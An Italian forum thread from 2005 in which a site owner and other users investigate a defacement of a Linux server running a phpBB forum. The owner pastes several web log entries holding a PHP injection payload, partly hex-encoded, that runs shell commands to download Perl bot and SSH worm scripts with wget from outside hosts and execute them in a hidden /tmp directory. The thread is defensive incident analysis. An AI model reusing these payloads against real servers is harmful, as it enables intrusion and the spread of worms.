Identificare la causa di un defacement

[fede_pg]

Sul server, dopo una scansione di porte, ho trovato la porta aperta di una vecchia conoscenza... subseven

Aspetto di vedere quel che mi risponde l'assistenza.

[uMoR]

si ok ma è un server windows ?

[fede_pg]

Allora, il server è Linux, ma purtroppo la porta del SubSeven è la stessa del Ramen... che il con RedHat ci va d'accordo credo .

Cmq sia, al mio hosting provider risulta che il server sia più che ok, quindi magari i miei scanner fanno le bizze... cmq sia i log FTP sono "puliti", nulla di anomalo. I log web invece recano una mare di richieste (senza successo) come le seguenti (ne posto un paio):

HTTP/1.1" 200 27442 "-" "LWP::Simple/5.69"
62.75.160.169 - - [01/Jan/2005:23:51:15 +0100] "GET
/modules.php?name=Forums&rush=echo%20_START_%3B%20k illall%20-9%20perl;cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20http://www.abcft.org/themes/bot.htm;wget%20http://http://weblicious.com/.notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.h tm;rm%20bot.htm%3B%20echo%20_END_&highlight=%2527. passthru(%24HTTP_GET_VARS%5Brush%5D).%2527';

HTTP/1.0" 200 31340 "-" "LWP::Simple/5.48"
82.165.33.199 - - [02/Jan/2005:13:11:46 +0100] "GET
/modules.php?name=Forums&rush=%65%63%68%6F%20%5F%53 %54%41%52%54%5F%3B%20killall%20-9%20perl;cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20http://www.abcft.org/themes/bot.htm;wget%20http://http://weblicious.com/.notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.h tm;rm%20bot.htm%3B%20%65%63%68%6F%20%5F%45%4E%44%5 F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%4 8%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73% 68%5D%29.%2527';

HTTP/1.1" 200 31349 "-" "LWP::Simple/5.69"
193.158.85.100 - - [02/Jan/2005:17:02:34 +0100] "GET
/modules.php?name=Forums&rush=%65%63%68%6F%20%5F%53 %54%41%52%54%5F%3B%20killall%20-9%20perl;cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20http://www.abcft.org/themes/bot.htm;wget%20http://http://weblicious.com/.notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.h tm;rm%20bot.htm%3B%20%65%63%68%6F%20%5F%45%4E%44%5 F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%4 8%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73% 68%5D%29.%2527';

Ora mi domando xò (dato che gli attacchi loggati sopra non hanno avuto successo ed il server è ok), da dove cavolo passano sti rompiscatole???

[Habanero]

Mah.. dal codice 200 direi che invece le richieste sono andate a buon fine....

E nei link nascosti nelle richieste direi che non c'è proprio della bella roba... dei bei codici Perl che cercano siti vulnerabili.

In un commento c'è scritto:
#Priv8crew - ssh.D.Worm

[uMoR]

come puoi notare dalle stringhe stesse eseguono comandi tipo wget (che scarica file) o killall che killa processi

prova a eseguire le stesse query a vedere che succede

[Habanero]

stavo appunto notando....

Direi che sono brasiliani (strano!):
http://search.msn.com.br/advresults.aspx

[makuro]

Dai magari un'occhiata se le directory /tmp e /var/tmp sono accedibili e utilizzabili...

[fede_pg]

Originariamente inviato da makuro
Dai magari un'occhiata se le directory /tmp e /var/tmp sono accedibili e utilizzabili...

Ho accesso alla directory tmp, i permessi sono 700, dentro ci sono i files di Awstat, Analog ed altro per le statistiche.

Ci sono altre cose che devo controllare? (Intanto il forum non lo reinstallo ovviamente...)

Quanto al codice della richiesta HTTP devo dire che come un fagiano non ci ho fatto caso... sorry, il 200 non lo avevo notato...


Altra cosa, ma è possibile che la correzione che andava apportata al forum non abbia funzionato? Ma che combina sto phpBB ???


Grazie a tutti, per sdebitarmi rispondo ai post sul Forum Microsoft Server 24 su 24 fino al 2008

[fede_pg]

A ulteriore conferma del fatto che fossero brasiliani, ho trovato pure questo file, sh.py, ho allegato una schermata dello stesso.

Ciao

[uMoR]

ma si sono i "brasilian hackers" avevano defacciato anche html.it un po di anni fa

cmq sono programmi auto rooter che ti "rottano" da soli prendendo bug del cavolo..